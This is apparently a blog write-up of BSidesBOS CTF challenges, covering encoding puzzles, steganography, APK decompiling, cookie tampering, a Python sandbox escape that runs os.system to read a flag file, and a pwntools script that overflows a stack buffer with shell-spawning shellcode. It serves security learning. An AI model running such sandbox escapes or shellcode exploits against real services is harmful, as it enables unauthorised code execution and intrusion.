BSidesBOS CTF Writeup’s

Challenge name: Read The Rules

Please follow the rules for this CTF!

Connect here: https://bsidesbos.ctf.games/rules

Solution:

Open the above link and inspect the page. Check the entire source you’ll find the flag.

Flag: flag{its_time_to_hack} 

Challenge name: baseball

I found this baseball… but… it doesn’t look like a baseball?

Download the file baseball

Solution:

The given file contains the base64 encoded text

TzRaVUNVMlRNRTRIQTZMSFBGWkdTNVpTSzVZVU1ZSllIQk5ER00zREdKTkhBVTJWSkJHVkNWMllPRlVFSzMyRE9GTUVNMkNaR0Y1RU1VUlpNUlNHS1JSWE9CQ1VVU1pZSk4ySEFWVFVPVTJGQzJDV000WlUyUVNHSlpBVFNNUT0=

base64 decoder: https://www.base64decode.org/

After decoding it we have the base32 encoded text

w3ASSa8pygyriw2WqFa88Z33c2ZpSUHMQWXqhEoCqXFhY1zFR9ddeF7pEJK8KtpVtu4QhVg3MBFNA92

base32 decoder: https://cryptii.com/pipes/base32

The resulting value is base 58 encoded text. Decoding it with the base58 decoder we have the flag.

base58 decoder : https://www.appdevtools.com/base58-encoder-decoder

Flag:

flag{wow_you_hit_a_homerun_and_really_ran_the_bases_there} 

Challenge name: Kiddie Pool

Look at this new graphic design technique I learned! This is like 900% cool!!!

Download the file below.

https://imgur.com/9F1s7o1

Flag

flag{whirlpool_in_a_cinch}

Solution

In the News: In 2007 the police catched a pedophile men who tried to mask his identity with a swirl face.

https://i2.wp.com/i.imgur.com/9F1s7o1.png?w=770&ssl=1

There are several programs that can do this, including photoshop. I do not have photoshop. After a bit of searching and a couple online programs that didn’t work, and not luck with gimp, came across a python package call Wand.

https://docs.wand-py.org/en/0.6.3/

Wrote a quick script (see the github writeup link ) and along with the hint “900%” quickly got that flag.

https://i.imgur.com/VRtn7IZ.png

EZ Bake Oven

Do you like baking? Don’t leave the oven on for too long!

Open the Deployment tab to start this challenge.

Flag

flag{you_are_the_master_baker}

Solution

Clicking on the deployment tab sets up a connection for us:

http://challenge.ctf.games:32575/

Navigating to the given site presents us with: https://i.imgur.com/3uuO8Pz.png

Last option – “magic cookies” sounds interesting. Started baking. Timer has nearly 120 Hours…. no, no, .. that won’t do.

After messing around in the developer options on the browser, noticed that a cookie was set. base64 decoding shows that the time was set and each second the javascript checks the amount of time left. If we could change the cookie …

Off to Burp suite. Navigate to the site and start baking. Intercept… Reload the page as capture the cookie. base64 encode the string of your choice. in this case:

{"recipe": "Magic Cookies", "time": "09/21/2020, 17:23:29"}

Which is roughly 120 hours ago.
submit the altered request and when the site reloads… success https://i.imgur.com/Ajzi0q6.png

challenge name : y2k

They told us the world was going to end in the year 2000! But it didn’t… when will the world end?

Solution:

Connecting to the instance and playing around with it, we came to deduce from the errors when providing invalid input that it was a python sandbox challenge. My plan was to get access to the os module and execute the system function from it.

from pwn import *

p = remote('challenge.ctf.games', 31656)
print(p.recv())
p.sendline("__import__('os').system('cat flag.txt')")
print(p.recv())
Flag: flag{we_are_saved_from_py2_k}

challenge name : mobility

Always wanted to calculate HMACs on your phone? Check out our new app! It supports 6 different algorithms.

Solution:

We are given an apk which we need to reverse. I simply decompiled it using jadx-gui and examined the code in the MainActivity.java file. It was a program to calculate the HMAC of a given user input. We can see an interesting array with easily recognizable decimal values; the first four of which are the ascii values for ‘flag’. Translating the contents of this array gets us the flag.

Flag: flag{classic_apk_decompile_shenanigans}

seashells

Can you collect all the shells?

Solution:

Baby pwn challenge for this ctf. Running it for the first time, we receive what looks like a stack address. We can verify this by checking the memory mappings with gdb. Since all protections are off, we can simply do the classic shellcode on stack then redirect the code flow to the given stack address (which is the address of the input we provide).

from pwn import *

#:
p = process('./seashells')
#p = remote('challenge.ctf.games', 32134)
#db.attach(p, 'break *main')
leak = int(p.recvuntil('\n'), 16)
print('[*] stack leak: {}'.format(hex(leak)))

context.arch = 'amd64'
exploit = asm(shellcraft.sh())
exploit += '\x00' * (136 - len(exploit))
exploit += p64(leak)

print(p.recv())
p.sendline(exploit)
print(p.recv())
p.interactive()

Flag: flag{popping_shells_by_the_sea_shore}

Saving the World

Sometimes I dream of saving the world. Saving everyone from the invisible hand, the one that brands us with an employee badge, the one the forces us to work for them, the one that controls us every day without us knowing it. But I can’t stop it. I’m not that special. I’m just anonymous. I’m just alone.

[Download the file — see github]

Flag

flag{take_care_of_whiterose}

Solution

Download the file and open to view. Looks like and ad with some interesting numbers. Looked like character values A=1 .. Z = 26.

6 2 26 8 16 21 17 18 3 18 1 17 6 8 3 2 1 14 5 18 17 10 21 18 18 25 15 14 5 5 2 10 20 25 14 13 18 17 10 22 7 21 5 14 22 1 10 14 7 18 5 15 18 6 22 17 18 7 21 18 10 21 22 7 18 16 21 22 16 24 18 1 6 7 21 18 3 14 6 6 10 2 5 17 22 6 7 10 18 25 25 22 16 24 25 2 6 18 6 16 7 2

But decoded didn’t look like much…

fbzhpuqrcraqfhcbanerqjurryoneebjtynmrqjvguenvajngreorfvqrgurjuvgrpuvpxrafgurcnffjbeqvfgjryyvpxybfrfpgb

Tried a couple things like xor and sub. Ended up on ROT13:

somuchdependsuponaredwheelbarrowglazedwithrainwaterbesidethewhitechickensthepasswordistwellicklosescto

Cleaned up, this reads “so much depends upon a red wheel barrow glazed with rain water beside the white chickens the password is twellicklosescto”

Password? Interesting. Lets see what steghide has to say:

[email protected]:~/Desktop$ steghide --info menu.jpg 
"menu.jpg":
  format: jpeg
  capacity: 6.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "flag.txt":
    size: 29.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

Embedded file? Extract it please

[email protected]:~/Desktop$ steghide extract -sf menu.jpg -p twellicklosescto 
wrote extracted data to "flag.txt".

Open the file and get your flag.

Leave a Comment

%d bloggers like this: